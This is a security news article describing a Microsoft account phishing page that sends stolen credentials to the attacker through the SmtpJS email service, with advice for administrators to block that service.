A new landing page for a Microsoft account phishing scam has been discovered that utilizes the SmtpJS service to send stolen credentials via email to the attacker.
There is nothing special about the appearance of the Microsoft account phishing page shown below that was discovered by MalwareHunterTeam. It's your standard Microsoft login template that will ask you for your Microsoft credentials and then tell you that the submitted credentials are incorrect.
When users submit their credentials in phishing scams like this, the page typically saves them to a database for retrieval later or uses a backend script to send them off to the attacker.
This particular landing page does something different by utilizing the SmtpJS service to send an email to the attacker via JavaScript.
For security researchers and analysts, the advantage to this is that they can simply view the source for the landing page to see the configuration being used by SmtpJS as shown below.
The embedded config includes the sender email address the stolen credentials will be sent as, the address they will be sent to, and the secure token need to send email via SmtpJS. Using this information analysts and researchers can potentially link the attacker to other campaigns and make it easier for law enforcement to track them.
This configuration is passed along to smtpjs.com when a user enters their credentials so that it can generate an email to the specified user as shown below.
While researchers benefit from the public config used by SmtpJS, system administrators can also benefit by blocking the service on their web filters.
Unless this service is absolutely needed in your organization, you can simply block access to the smtpjs site and phishing pages that utilize it won't be able to receive any submitted credentials.
This is also another example of how understanding the underlying infrastructure of a security threat can better allow system and network administrators to protect their users.
Post a Comment Community Rules
You need to login in order to post a comment
Not a member yet? Register Now